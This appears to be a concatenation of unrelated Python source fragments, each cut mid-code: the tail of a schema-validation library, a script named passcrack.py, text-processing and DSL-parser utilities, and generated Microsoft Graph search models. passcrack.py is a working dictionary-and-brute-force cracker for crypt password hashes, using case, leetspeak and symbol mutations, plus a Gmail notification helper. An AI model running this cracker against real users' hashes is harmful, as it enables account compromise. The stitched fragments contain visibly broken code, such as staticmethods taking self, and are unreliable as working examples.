're.MULTILINE', 're.LOCALE', 're.IGNORECASE', 're.TEMPLATE']
def __init__(self, pattern_str, flags=0, error=None):
self._pattern_str = pattern_str
flags_list = [Regex.NAMES[i] for i, f in # Name for each bit
enumerate('{0:09b}'.format(flags)) if f != '0']
if flags_list:
self._flags_names = ', flags=' + '|'.join(flags_list)
else:
self._flags_names = ''
self._pattern = re.compile(pattern_str, flags=flags)
self._error = error
def __repr__(self):
return '%s(%r%s)' % (self.__class__.__name__, self._pattern_str, self._flags_names)
def validate(self, data):
"""
Validated data using defined regex.
:param data: data to be validated
:raises SchemaError: when data does not match
:return: return validated data.
"""
err = self._error
try:
if self._pattern.search(data):
ret = data
else:
raise SchemaError('%r does not match %r' % (self, data), err)
except TypeError:
raise SchemaError('%r is not string nor buffer' % data, err)
return ret
class Use(object):
"""
For more general use cases, you can use the Use class to transform
the data while it is being validate.
"""
def __init__(self, callable_, error=None):
assert callable(callable_)
self._callable = callable_
self._error = error
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self._callable)
def validate(self, data):
"""
Validate object.
:param data: data to validate
:raises SchemaError: when schema doesn't match
:return: Validation result
"""
try:
result = self._callable(data)
except SchemaError as exc:
raise SchemaError([None] + exc.autos, [self._error.format(data) if self._error else None] + exc.errors)
except BaseException as exc:
raise SchemaError('%s(%r) raised %r' % (_callable_str(self._callable), data, exc),
self._error.format(data) if self._error else None)
return result
COMPARABLE, CALLABLE, VALIDATOR, TYPE, DICT, ITERABLE = range(6)
def get_object_priority(obj):
"""
Return priority for a given object
:param obj: Object to prioritise
:return: type of the priority
"""
if isinstance(obj, (list, tuple, set, frozenset)):
ret = ITERABLE
elif isinstance(obj, dict):
ret = DICT
elif issubclass(type(obj), type):
ret = TYPE
elif hasattr(obj, 'validate'):
ret = VALIDATOR
elif callable(obj):
ret = CALLABLE
else:
ret = COMPARABLE
return ret
class Schema(object):
"""
Entry point of the library, use this class to instantiate validation
schema for the data that will be validated.
"""
def __init__(self, schema, error=None, ignore_extra_keys=False):
self._schema = schema
self._error = error
self._ignore_extra_keys = ignore_extra_keys
@property
def scheme(self):
"""
Get scheme object.
:return: Schema object instance
"""
return self._schema
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self._schema)
@staticmethod
def _dict_key_priority(d_key):
"""
Return priority for a given key object.
:param d_key: dictionary
:return: prioritised dictionary
"""
if isinstance(d_key, Forbidden):
ret = get_object_priority(d_key.scheme) - 0.5
elif isinstance(d_key, Optional):
ret = get_object_priority(d_key.scheme) + 0.5
else:
ret = get_object_priority(d_key)
return ret
def is_valid(self, data):
"""
Return whether the given data has passed all the validations
that were specified in the given schema.
:param data: examined object
:return: bool
"""
try:
self.validate(data)
except SchemaError:
ret = False
else:
ret = True
return ret
def validate(self, data):
"""
Validate schema.
:param data: examined object
:raises SchemaUnexpectedTypeError: when type mismatch
:raises SchemaWrongKeyError: when key is wrong
:raises SchemaForbiddenKeyError: when key is forbidden
:raises SchemaMissingKeyError: when key is missing
:raises SchemaError: when schema do not validate
:return: validation result
"""
# pylint: disable=R0914,R1702,R1705,R0912,R0915,R0911
schema_class = self.__class__
schema_data = self._schema
err_set = self._error
ign_ex_keys = self._ignore_extra_keys
flavor = get_object_priority(schema_data)
if flavor == ITERABLE:
data = schema_class(type(schema_data), error=err_set).validate(data)
or_stat = Or(*schema_data, error=err_set, schema=schema_class, ignore_extra_keys=ign_ex_keys)
return type(data)(or_stat.validate(d) for d in data)
if flavor == DICT:
data = schema_class(dict, error=err_set).validate(data)
new = type(data)() # new - is a dict of the validated values
coverage = set() # matched schema keys
# for each key and value find a schema entry matching them, if any
sorted_skeys = sorted(schema_data, key=self._dict_key_priority)
for key, value in data.items():
for skey in sorted_skeys:
svalue = schema_data[skey]
try:
nkey = schema_class(skey, error=err_set).validate(key)
except SchemaError:
pass
else:
if isinstance(skey, Forbidden):
# As the content of the value makes little sense for
# forbidden keys, we reverse its meaning:
# we will only raise the SchemaErrorForbiddenKey
# exception if the value does match, allowing for
# excluding a key only if its value has a certain type,
# and allowing Forbidden to work well in combination
# with Optional.
try:
nvalue = schema_class(svalue, error=err_set).validate(value)
except SchemaError:
continue
raise SchemaForbiddenKeyError('Forbidden key encountered: %r in %r' % (nkey, data), err_set)
else:
try:
nvalue = schema_class(svalue, error=err_set,
ignore_extra_keys=ign_ex_keys).validate(value)
except SchemaError as exc:
msg = "Schema key '%s' error:" % nkey
raise SchemaError([msg] + exc.autos, [err_set] + exc.errors)
else:
new[nkey] = nvalue
coverage.add(skey)
break
required = set(obj for obj in schema_data if not isinstance(obj, (Optional, Forbidden)))
if not required.issubset(coverage):
missing_keys = required - coverage
s_missing_keys = ', '.join(repr(key) for key in sorted(missing_keys, key=repr))
raise SchemaMissingKeyError('Missing options: ' + s_missing_keys, err_set)
if not self._ignore_extra_keys and (len(new) != len(data)):
wrong_keys = set(data.keys()) - set(new.keys())
s_wrong_keys = ', '.join(repr(key) for key in sorted(wrong_keys, key=repr))
raise SchemaWrongKeyError('Unexpected option %s in %r' % (s_wrong_keys, data),
err_set.format(data) if err_set else None)
# Apply default-having optionals that haven't been used:
defaults = set(key for key in schema_data if isinstance(key, Optional)
and hasattr(key, 'default')) - coverage
for default in defaults:
new[default.key] = default.default
return new
if flavor == TYPE:
if isinstance(data, schema_data):
return data
else:
raise SchemaUnexpectedTypeError('%r should be type of %r' % (data, schema_data.__name__),
err_set.format(data) if err_set else | |
<filename>passcrack.py<gh_stars>0
# Simple email script meant for a gmail sender
def sendEmail(fromGmail, fromPwd, toEmails, subject, body):
# Import smtp library
import smtplib
# Initialize vars
usr = fromGmail
pwd = <PASSWORD>Pwd
FROM = usr
TO = toEmails if type(toEmails) is list else [toEmails]
SUBJECT = subject
TEXT = body
# Prepare and attempt to send email message
message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
""" % (FROM, ", ".join(TO), SUBJECT, TEXT)
try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(usr, pwd)
server.sendmail(FROM, TO, message)
server.close()
print "Successfully sent the email"
except:
print "Failed to send the email"
# Capitalize every other letter in a string
# idx == 0 -> start with first letter, idx == 1 -> start with second letter
def capEveryOther(word, idx):
ret = ""
for i in range(0, len(word)):
if (i + idx) % 2 == 0:
ret += word[i].upper()
else:
ret += word[i].lower()
return ret
# Perform character-to-number/symbol substitution
def charSubst(word, old, new):
tmp = word.replace(old.lower(), new)
ret = tmp.replace(old.upper(), new)
return ret
# Password cracking script
import sys
import time
import crypt
from itertools import product
if len(sys.argv) != 5:
print "Usage: {} dictionary.txt alg salt hash".format(sys.argv[0])
else:
# Read in arguments
dct = str(sys.argv[1])
alg = str(sys.argv[2])
slt = str(sys.argv[3])
hsh = str(sys.argv[4])
# Declare variables
startTime = time.time()
MAX_LEVEL = 6
hashFound = False
hashGuess = ""
passGuess = ""
formattedSalt = ""
temp = ""
entryPerms = []
level = 1
i = -1
j = 0
alg = int(alg)
levelOneT = 0
levelTwoT = 0
levelThreeT = 0
levelFourT = 0
levelFiveT = 0
emailTimeStr = ""
numSubChars = ["l", "e", "a", "s", "b", "t", "o"]
symSubChars = ["i", "a", "v", "s", "c"]
specChars = ["!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "+", "=", ",", "/", "\\", "?", "'", "<", ">", ";", ":", "~", "[", "]", "{", "}", "|"]
bruteChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.,!?@#$%^&*()=+'\"/\;:[]{}|`~<> "
# Create a formatted salt based on the input
# If alg does not equal 1, 5, or 6, assumed to be DES
if alg == 1 or alg == 5 or alg == 6:
formattedSalt = "$" + str(alg) + "$" + str(slt) + "$"
else:
formattedSalt = str(slt)
alg = 0
levelOneF = "level-one-" + str(alg) + ".txt"
levelTwoF = "level-two-" + str(alg) + ".txt"
levelThreeF = "level-three-" + str(alg) + ".txt"
levelFourF = "level-four-" + str(alg) + ".txt"
refFile = open(dct, "r")
modFile = open(levelOneF, "w")
print "Time elapsed (in seconds) for:\n"
emailTimeStr += "Time elapsed (in seconds) for:\n"
# Perform password guessing logic based on dictionary entries, substitutions, and other various methods
while hashGuess != hsh:
line = refFile.readline()
if line == "":
level += 1
if refFile is not None:
refFile.close()
if modFile is not None:
modFile.close()
if level == 2:
refFile = open(levelOneF, "r")
modFile = open(levelTwoF, "w")
levelOneT = time.time()
print "Level x: {} \n".format(levelOneT - startTime)
emailTimeStr += "Level 1: {} \n".format(levelOneT - startTime)
elif level == 3:
refFile = open(levelTwoF, "r")
modFile = open(levelThreeF, "w")
levelTwoT = time.time()
print "Level 2: {} \n".format(levelTwoT - levelOneT)
emailTimeStr += "Level 2: {} \n".format(levelTwoT - levelOneT)
elif level == 4:
refFile = open(levelThreeF, "r")
modFile = open(levelFourF, "w")
levelThreeT = time.time()
print "Level 3: {} \n".format(levelThreeT - levelTwoT)
emailTimeStr += "Level 3: {} \n".format(levelThreeT - levelTwoT)
elif level == 5:
refFile = open(levelFourF, "r")
modFile = None
levelFourT = time.time()
print "Level 4: {} \n".format(levelFourT - levelThreeT)
emailTimeStr += "Level 4: {} \n".format(levelFourT - levelThreeT)
elif level == 6:
refFile = None
modFile = None
levelFiveT = time.time()
print "Level 5: {} \n".format(levelFiveT - levelFourT)
emailTimeStr += "Level 5: {} \n".format(levelFiveT - levelFourT)
if refFile is not None:
line = refFile.readline()
line = line.rstrip("\n")
# Use the level value to determine what type of modification to make to base dictVals
# Higher the level == more complicated/time-consuming attempts.
# In principle, quicker/easier passwords will be attempted first
# Set temp to current entry
temp = line
entryLen = len(temp)
entryPerms = []
# Pad shorter entries with a common "123..."
if entryLen < 6:
for j in range(1, 7 - entryLen):
temp += str(j)
if level == 1:
''' Level 1: (Letter Case) For each dictionary entry try:
- all lower case
- all upper case
- first letter capitalized
- every other letter capitalized (starting with the first one)
- every other letter capitalized (starting with the second one)
'''
modFile.write(temp.lower() + "\n")
entryPerms.append(temp.lower())
modFile.write(temp.upper() + "\n")
entryPerms.append(temp.upper())
modFile.write(temp.capitalize() + "\n")
entryPerms.append(temp.capitalize())
modFile.write(capEveryOther(temp, 0) + "\n")
entryPerms.append(capEveryOther(temp, 0))
modFile.write(capEveryOther(temp, 1) + "\n")
entryPerms.append(capEveryOther(temp, 1))
elif level == 2:
''' Level 2: (Number Substitution) For each value from level 1, try:
- 1 for l
- 3 for e
- 4 for a
- 5 for s
- 6 for b
- 7 for t
- 0 for o
- Combinations of each of the above
'''
modFile.write(temp + "\n")
entryPerms.append(temp)
# Count number of chars that can be substituted
charCount = 0
subsMade = 0
tmpSub = ""
for j in range(0, len(numSubChars)):
if numSubChars[j] in temp:
charCount += 1
for j in range(0, charCount):
subsMade = 0
tmpSub = temp
if "l" in temp or "L" in temp:
tmpSub = charSubst(tmpSub, "l", "1")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "e" in temp or "E" in temp:
tmpSub = charSubst(tmpSub, "e", "3")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "a" in temp or "A" in temp:
tmpSub = charSubst(tmpSub, "a", "4")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "s" in temp or "S" in temp:
tmpSub = charSubst(tmpSub, "s", "5")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "b" in temp or "B" in temp:
tmpSub = charSubst(tmpSub, "b", "6")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "t" in temp or "T" in temp:
tmpSub = charSubst(tmpSub, "t", "7")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "o" in temp or "O" in temp:
tmpSub = charSubst(tmpSub, "o", "0")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
elif level == 3:
''' Level 3: (Ordering Permutation) For each value from level 2, try:
- Reversing the entry
'''
modFile.write(temp + "\n")
entryPerms.append(temp)
modFile.write(temp[::-1] + "\n")
entryPerms.append(temp[::-1])
elif level == 4:
''' Level 4: (Symbol Substitution) For each value from level 3, try:
- ! for i
- @ for a
- ^ for v
- $ for s
- ( for c
- Combinations of each of the above
'''
modFile.write(temp + "\n")
entryPerms.append(temp)
#Count number of chars that can be substituted
charCount = 0
subsMade = 0
tmpSub = ""
for j in range(0, len(symSubChars)):
if symSubChars[j] in temp:
charCount += 1
for j in range(0, charCount):
subsMade = 0
tmpSub = temp
if "i" in temp or "I" in temp:
tmpSub = charSubst(tmpSub, "i", "!")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "a" in temp or "A" in temp:
tmpSub = charSubst(tmpSub, "a", "@")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "v" in temp or "V" in temp:
tmpSub = charSubst(tmpSub, "v", "^")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
| |
replacing tags
"""
# remove tags
untagged_text = str.join(
" ", list(ET.fromstring(xml_string).itertext()))
return untagged_text
@staticmethod
def remove_para_tags(text):
"""remove certain tags within paras lexically.
Works on flat text
Messy. At present tags are in TAGS and TAG_REGEXES
"""
for key in TAGS:
text = text.replace(key, TAGS[key])
for regex in TAG_REGEXES:
text = re.sub(regex, TAG_REGEXES[regex], text)
return text
@staticmethod
def flatten_non_ascii(text):
"""remove diacritics and other 'non-ascii' characters
Messy.
"""
text = text.encode("ascii", "ignore").decode("utf-8", "ignore")
return text
@staticmethod
def remove_non_alphanumeric(text, remove_digits=False):
"""
Remove nonalphanumeric characters
remove_digits: remove digits 0-9
"""
pattern = r'[^A-Za-z0-9\s]' if not remove_digits else r'[A-Za-z\s]'
text = re.sub(pattern, '', text)
return text
@staticmethod
def get_aggregate_words_from_files(files):
all_words = []
for file in files:
words = TextUtil.get_section_with_words(file).words
all_words.extend(words)
return all_words
@staticmethod # OBSOLETE
def filter_words(words) -> list:
words = [w for w in words if len(w) > 2]
words = [w for w in words if w.lower() not in STOPWORDS_EN]
words = [w for w in words if w.lower() not in STOPWORDS_PUB]
words = [w for w in words if not w.isnumeric()]
return words
@classmethod
def replace_chars(cls, text, unwanted_chars, replacement) -> str:
"""replaces all chars in unwanted chars with wanted_char
:param text: source text
:param unwanted_chars: string or list of unwanted characters
:param replacement: replacement character
:returns modified string
"""
text0 = ''.join(
[c if c not in unwanted_chars else replacement for c in text])
return text0
@classmethod
def split_into_sentences(cls, text, method="Spacy") -> list:
""" splits a paragraph into sentences
uses nltk sent_tokenize
:param text: para to split
:returns: list of sentences (empty list for null or empty input)
"""
sentences = []
if text:
sentences = nltk.sent_tokenize(text)
for sent in sentences[:10]:
cls.logger.debug(">>", sent)
return sentences
@classmethod
def split_at_empty_newline(cls, text) -> list:
"""create a new section at each empty newlines
leading newline is ignored
trailing whitspace is trimmed
Example:
foo
bar
baz
boodle
will give:
['foo\nbar', 'baz', '', `boodle`]
trailing newlines are consumed.
final newline?[EOF] is consumed
"""
# trim leading newline
if text[0] == "\n":
text = text[1:]
lines = text.split('\n')
sects = []
sect = []
for line in lines:
line = line.rstrip()
if line == '':
sects.append(sect)
sect = []
else:
sect.append(line)
if len(sect) > 0:
sects.append(sect)
return sects
@classmethod
def test_split_at_empty_newline(cls):
text = """
foo
bar
baz
boodle
"""
lines = cls.split_at_empty_newline(text)
assert(str(lines) == "[['foo', 'bar'], ['baz'], [], ['boodle']]")
class WordFilter:
# These should really be read from path
# false positives in organizatiom dictionary.
ORG_STOP = {
"basis",
"orange",
}
""" filters a list of words
generally deletes words not satisfying a condition but this may develop
"""
def __init__(self, stopword_sets=[STOPWORDS_EN, STOPWORDS_PUB],
min_length=2, delete_numeric=True, delete_non_alphanum=True):
self.min_length = min_length
self.use_lower_stopwords = True
self.stop_words_set = {}
for swset in stopword_sets:
self.stop_words_set = self.stop_words_set.union(swset)
# set(STOPWORDS_EN).union(STOPWORDS_PUB)
self.delete_numeric = delete_numeric
self.delete_non_alphanum = True
self.regex = None
self.keep_regex = True
self.split_spaces = False
def show_params(self):
self.logger.info("min length", self.min_length,
"use lower", self.use_lower_stopwords,
"sop wrds set", self.stop_words_set,
"delete numeric", self.delete_numeric,
"delete nonalpha", self.delete_non_alphanum,
"regex", self.regex,
"keep regex", self.keep_regex,
"split spaces", self.split_spaces
)
def filter_words(self, words):
words = self.delete_short_words(words, self.min_length)
words = self.delete_stop_words(words, self.stop_words)
if self.delete_numeric:
words = self.delete_num(words)
if self.delete_non_alphanumeric:
words = self.delete_non_alphanum(words)
if self.regex is not None:
words = self.filter_by_regex(words, self.regex, self.keep_regex)
return words
def set_regex(self, regex_string, keep=True):
""" filter words by regex
regex_string: regex to match
keep: if True accept matching words else reject matches
"""
self.regex = re.compile(regex_string)
self.keep_regex = keep
@staticmethod
def delete_num(self, words):
"""delete words satisfying str.isnumeric() """
words = [w for w in words if not w.isnumeric()]
return words
@staticmethod
def delete_non_alphanum(self, words):
"""delete strings satisfying str.isalnum()"""
words = [w for w in words if w.isalnum()]
return words
@staticmethod
def delete_stop_words_list(self, words, stop_words_list):
"""delete words in lists of stop words"""
for stop_words in stop_words_list:
words = [w for w in words if w.lower() not in stop_words]
return words
def filter_stop_words(self, words, stop_words, keep=False):
if keep:
words = [w for w in words if w.lower() in stop_words]
else:
words = [w for w in words if w.lower() not in stop_words]
return words
def delete_short_words(self, words, min_length):
"""delete words less than equal to min_length"""
words = [w for w in words if len(w) > min_length]
return words
def filter_by_regex(self, words, regex_string, keep=True):
words1 = [w for w in words if re.match(regex_string)]
return words1
class DSLParser:
"""A DomainSpecificLangauge parser for pyami commands
currently accepts a simple nested lambda-like language similar to xpath
Later we'll move to something like pyparsing
https://pyparsing-docs.readthedocs.io/
"""
STR = "STR"
LIST = "LIST"
NUMB = "NUMB"
FILE = "FILE"
# assertions
FILE_EXISTS = "file_exists"
GLOB_COUNT = "glob_count"
ITEM = "item"
LEN = "len"
OPERATORS = {
"concat": [STR, STR],
"contains": [STR, STR],
"content": [FILE],
"count": [LIST],
"ends_with": [STR, STR],
"equals": [[STR, NUMB], [STR, NUMB]],
"exists": [FILE],
"greater_than": [[STR, NUMB], [STR, NUMB]],
"item": [LIST, NUMB],
"less_than": [[STR, NUMB], [STR, NUMB]],
"length": [STR],
"lower": [STR],
"normalize": [STR],
"reg_matches": [STR, STR],
"starts_with": [STR, STR],
"substring": [STR, NUMB, NUMB],
"upper": [STR],
}
logger = logging.getLogger("dsl_parser")
def __init__(self):
self.tree = {}
self.argstr = None
def parse_and_run(self, expr):
"""
:param expr:
"""
self.arg_store = []
self.current_dict = None
self.parse_args(expr)
self.logger.info(f"parsed: {self.arg_store}")
return
def parse_args(self, argstr):
self.logger.info(f"argstr: {argstr}")
if not argstr:
return None, None
args = []
while len(argstr) > 0:
grabbed = self.grab_next_arg(argstr)
if not grabbed:
self.logger.debug(f"DSL Null args")
break
# continue
arg = grabbed[0]
rest_argstr = grabbed[1]
self.logger.info(f" EXTRACTED {arg} "
f" ... {rest_argstr}")
if arg is not None:
arg = self.dequote(arg)
self.current_dict = {}
self.current_dict["extracted"] = arg
self.arg_store.append(self.current_dict)
args.append(arg)
if not rest_argstr or len(rest_argstr) == 0:
break
if rest_argstr[0] != ',':
raise ValueError(f"expected leading comma in {rest_argstr}")
argstr = rest_argstr[1:]
self.logger.info(f"{len(args)} ARGS: {args}")
def dequote(self, arg):
"""remove balanced qoutes from start and end of string
len(arg) must be > 1
:param arg:string to dequote
:returns: dequoted string or original if not possible
"""
if isinstance(arg, str):
# start/end are same character
if len(arg) > 1 and (arg[0] == arg[-1]):
if arg[0] == "'" or arg[0] == '"':
arg = arg[1:-1]
return arg
def grab_next_arg(self, argstr):
# next() can be NUMB, FILE, EXPR, STR, LIST
ch = argstr[0]
arg = None
if ch == '\"' or ch == "\'": # string or possibly list
arg, rest_args = self.grab_string(argstr)
self.logger.debug(len(arg))
arg = self.dequote(arg)
self.logger.debug(
f"argstr [{argstr}] grabbed quoted string arg: [{arg} ({len(arg)})] + rest_args [{rest_args}]")
elif ch in ".-+0123456789": # number
arg, rest_args = self.grab_number(argstr)
self.logger.debug(f"grabbed number {type(arg)} {arg}")
else: # expressiom
arg, rest_args = self.grab_expr(argstr)
self.logger.debug(f"arg: [{arg}] === rest_args: [{rest_args}]")
funct_arg = self.get_function_and_args(arg)
if not funct_arg:
return None
funct = funct_arg[0]
funct_args = funct_arg[1]
self.logger.debug(f" FUNCT: [{funct}] \n"
f" ... ARGS [{funct_args}]")
self.parse_args(funct_args)
arg = None
self.logger.debug(f"grabbed ||{arg}||{rest_args}||")
return arg, rest_args
def get_function_and_args(self, argstr):
if not argstr:
return None
idx = argstr.index("(")
funct = argstr[:idx]
funct_args = argstr[idx+1:-1]
return funct, funct_args
def grab_number(self, argstr): # ends with comma or EOS
idx = argstr.find(",", 1)
if idx == -1:
idx = len(argstr)
arg = self.create_int_or_float(argstr[:idx])
argstr = argstr[idx:]
return arg, argstr
def create_int_or_float(self, arg):
if isinstance(arg, int):
arg = int(arg)
elif isinstance(arg, float):
arg = float(arg)
return arg
def grab_string(self, argstr):
quote = argstr[0]
idx = argstr.find(quote, 1)
if idx == -1:
raise Exception(f"cannot parse as quoted string: {argstr}")
arg = argstr[:idx+1]
argstr = argstr[idx+1:]
self.logger.debug(f"str {argstr}")
return arg, argstr,
def grab_expr(self, argstr):
for key in self.OPERATORS:
if argstr.startswith(key + "("):
# idx = len(key)+1
idx = self.get_balanced_bracket(argstr)
arg = argstr[:idx + 1]
rest = argstr[idx + 1:]
self.logger.debug(f"{arg} -- {rest}")
return arg, rest
return None, None
def get_balanced_bracket(self, param):
level = 0
found_brackets = False
for i, c in enumerate(param):
if c == '(':
level += 1
found_brackets = True
elif c == ')':
level -= 1
if level < 0:
raise Exception(f"unexpected ) in {param}")
if level == 0:
return i
return -1
# ============================================
def assert_file_exists(self, file):
"""
:param file:
"""
if not os.path.exists(file):
self.assert_error(f"path {file} does not exist")
else:
self.logger.info(f"File exists: {file}")
pass
def assert_glob_count(self, glob_, count):
| |
self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.acl = kwargs.get('acl', None)
self.content = kwargs.get('content', None)
self.properties = kwargs.get('properties', None)
class MicrosoftGraphExternalItemContent(msrest.serialization.Model):
"""externalItemContent.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param type: Possible values include: "text", "html", "unknownFutureValue".
:type type: str or ~search.models.MicrosoftGraphExternalItemContentType
:param value:
:type value: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'type': {'key': 'type', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphExternalItemContent, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.type = kwargs.get('type', None)
self.value = kwargs.get('value', None)
class MicrosoftGraphInnerErrorDetail(msrest.serialization.Model):
"""innerErrorDetail.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param message:
:type message: str
:param source:
:type source: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'message': {'key': 'message', 'type': 'str'},
'source': {'key': 'source', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphInnerErrorDetail, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.message = kwargs.get('message', None)
self.source = kwargs.get('source', None)
class MicrosoftGraphProperty(msrest.serialization.Model):
"""property.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param aliases:
:type aliases: list[str]
:param is_content:
:type is_content: bool
:param is_queryable:
:type is_queryable: bool
:param is_refinable:
:type is_refinable: bool
:param is_retrievable:
:type is_retrievable: bool
:param is_searchable:
:type is_searchable: bool
:param labels:
:type labels: list[str or ~search.models.MicrosoftGraphLabel]
:param name:
:type name: str
:param type: Possible values include: "String", "Int64", "Double", "DateTime", "Boolean",
"StringCollection", "Int64Collection", "DoubleCollection", "DateTimeCollection".
:type type: str or ~search.models.MicrosoftGraphPropertyType
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'aliases': {'key': 'aliases', 'type': '[str]'},
'is_content': {'key': 'isContent', 'type': 'bool'},
'is_queryable': {'key': 'isQueryable', 'type': 'bool'},
'is_refinable': {'key': 'isRefinable', 'type': 'bool'},
'is_retrievable': {'key': 'isRetrievable', 'type': 'bool'},
'is_searchable': {'key': 'isSearchable', 'type': 'bool'},
'labels': {'key': 'labels', 'type': '[str]'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphProperty, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.aliases = kwargs.get('aliases', None)
self.is_content = kwargs.get('is_content', None)
self.is_queryable = kwargs.get('is_queryable', None)
self.is_refinable = kwargs.get('is_refinable', None)
self.is_retrievable = kwargs.get('is_retrievable', None)
self.is_searchable = kwargs.get('is_searchable', None)
self.labels = kwargs.get('labels', None)
self.name = kwargs.get('name', None)
self.type = kwargs.get('type', None)
class MicrosoftGraphSchema(MicrosoftGraphEntity):
"""schema.
:param id: Read-only.
:type id: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param base_type:
:type base_type: str
:param properties:
:type properties: list[~search.models.MicrosoftGraphProperty]
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
'base_type': {'key': 'baseType', 'type': 'str'},
'properties': {'key': 'properties', 'type': '[MicrosoftGraphProperty]'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.base_type = kwargs.get('base_type', None)
self.properties = kwargs.get('properties', None)
class MicrosoftGraphSearchAggregation(msrest.serialization.Model):
"""searchAggregation.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param buckets:
:type buckets: list[~search.models.MicrosoftGraphSearchBucket]
:param field:
:type field: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'buckets': {'key': 'buckets', 'type': '[MicrosoftGraphSearchBucket]'},
'field': {'key': 'field', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphSearchAggregation, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.buckets = kwargs.get('buckets', None)
self.field = kwargs.get('field', None)
class MicrosoftGraphSearchBucket(msrest.serialization.Model):
"""searchBucket.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param aggregation_filter_token:
:type aggregation_filter_token: str
:param count:
:type count: int
:param key:
:type key: str
"""
_validation = {
'count': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'aggregation_filter_token': {'key': 'aggregationFilterToken', 'type': 'str'},
'count': {'key': 'count', 'type': 'int'},
'key': {'key': 'key', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphSearchBucket, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.aggregation_filter_token = kwargs.get('aggregation_filter_token', None)
self.count = kwargs.get('count', None)
self.key = kwargs.get('key', None)
class MicrosoftGraphSearchEntity(MicrosoftGraphEntity):
"""searchEntity.
:param id: Read-only.
:type id: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphSearchEntity, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
class MicrosoftGraphSearchHit(msrest.serialization.Model):
"""searchHit.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param id:
:type id: str
:param score:
:type score: int
:param summary:
:type summary: str
:param content_source:
:type content_source: str
:param hit_id:
:type hit_id: str
:param rank:
:type rank: int
:param summary:
:type summary: str
:param source: entity.
:type source: ~search.models.MicrosoftGraphEntity
:param resource: entity.
:type resource: ~search.models.MicrosoftGraphEntity
"""
_validation = {
'score': {'maximum': 2147483647, 'minimum': -2147483648},
'rank': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'id': {'key': '_id', 'type': 'str'},
'score': {'key': '_score', 'type': 'int'},
'summary': {'key': '_summary', 'type': 'str'},
'content_source': {'key': 'contentSource', 'type': 'str'},
'hit_id': {'key': 'hitId', 'type': 'str'},
'rank': {'key': 'rank', 'type': 'int'},
'summary': {'key': 'summary', 'type': 'str'},
'source': {'key': '_source', 'type': 'MicrosoftGraphEntity'},
'resource': {'key': 'resource', 'type': 'MicrosoftGraphEntity'},
}
def __init__(
